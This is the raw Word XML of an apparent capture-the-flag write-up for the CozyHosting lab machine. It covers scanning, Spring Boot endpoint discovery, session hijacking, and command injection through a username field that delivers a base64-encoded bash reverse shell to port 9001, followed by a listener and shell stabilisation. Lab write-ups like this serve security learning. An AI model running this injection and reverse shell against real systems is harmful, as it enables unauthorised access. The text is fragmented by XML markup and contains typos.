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1A481CC7" w:rsidR="00843DCE" w:rsidRPr="000F552C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proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F552C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CozyHosting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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3F0DBBF1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0F552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F552C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000F552C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0F552C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000F552C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0F552C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000F552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F552C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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DD546FA" w14:textId="37C28AFF" w:rsidR="0087100A" w:rsidRDefault="0087100A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Gobuster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dir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</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00F83F2C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://url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-w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Seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Discovery/web-content/raft-small-word.txt</w:t>
      </w:r>
      <w:r w:rsidR="00BC36D8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46F72D72" w14:textId="3BC3BE35" w:rsidR="00843DCE" w:rsidRDefault="00880F27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When we visit some endpoint (extra) then with GET request then in response we obtain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whitelable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error page. In google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whitelable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error page has the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springboot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bug.</w:t>
      </w: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1586DF82" w14:textId="19931CC7" w:rsidR="00C77704" w:rsidRDefault="00C77704" w:rsidP="00C7770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We have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springboot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endpoints so try with it as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A546A2" w14:textId="1A82586C" w:rsidR="00C77704" w:rsidRDefault="00C77704" w:rsidP="00C77704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gobuster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dir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</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00F83F2C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://url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-w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Seclists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/Discovery/web-content/spring-boot.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23938494" w14:textId="77777777" w:rsidR="00C77704" w:rsidRDefault="00C77704" w:rsidP="00C7770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that endpoints there has 1 session id which is unauthorize and other is so visit the home page with inspect with that session id and its login and its admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="6CE8EAA8" w:rsidR="00843DCE" w:rsidRDefault="00C7770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Now in host and username we notice that in username when I encode then sent then </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>its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accurse an error. </w:t>
      </w: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7926EC80" w14:textId="77777777" w:rsidR="00C77704" w:rsidRDefault="00C77704" w:rsidP="00C77704">
      <w:pPr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So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create a script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654BF2F1" w14:textId="77777777" w:rsidR="00C77704" w:rsidRDefault="00C77704" w:rsidP="00C7770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Bash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&gt;&amp; /dev/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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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>/9001 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3FEEA" w14:textId="77777777" w:rsidR="00C77704" w:rsidRDefault="00C77704" w:rsidP="00C7770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file shell and encode it with base64 -w 0 shell and copy it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47180B" w14:textId="77777777" w:rsidR="00C77704" w:rsidRDefault="00C77704" w:rsidP="00C7770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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{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echo,paste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  <w:t>}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>|{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base64 -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d}|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bash; start the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lvnp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9001 and done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC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1E8C029" w14:textId="77777777" w:rsidR="00D24B04" w:rsidRDefault="00D24B04" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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7. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B88CB4" w14:textId="74491BF7" w:rsidR="00D24B04" w:rsidRPr="00D24B04" w:rsidRDefault="00D24B0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Python3-c ‘import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pty;pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.spawm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2DC30" w14:textId="4875C493" w:rsidR="00843DCE" w:rsidRDefault="0000028C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stty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raw -echo</w:t>
      </w:r>
      <w:r w:rsidR="007D46C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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fg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6922CFE8" w14:textId="3F668A3F" w:rsidR="00843DCE" w:rsidRDefault="00D3255F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by some hard styles we obtain the user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433634B2" w14:textId="77777777" w:rsidR="0039433E" w:rsidRDefault="0039433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0C0D8C61" w14:textId="3257309B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0028C"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000F552C"/>
    <w:rsid w:val="00383432"/>
    <w:rsid w:val="0039433E"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004360D4"/>
    <w:rsid w:val="004C6C14"/>
    <w:rsid w:val="00731CD2"/>
    <w:rsid w:val="007D46C7"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="0087100A"/>
    <w:rsid w:val="00880F27"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00B9598B"/>
    <w:rsid w:val="00BC36D8"/>
    <w:rsid w:val="00C77704"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D24B04"/>
    <w:rsid w:val="00D3255F"/>
    <w:rsid w:val="00D62EA2"/>
    <w:rsid w:val="00EB6F52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704"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10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0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url" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ur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3A9FF6-53F1-4C8F-82E7-39D0FD341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17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-10T16:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>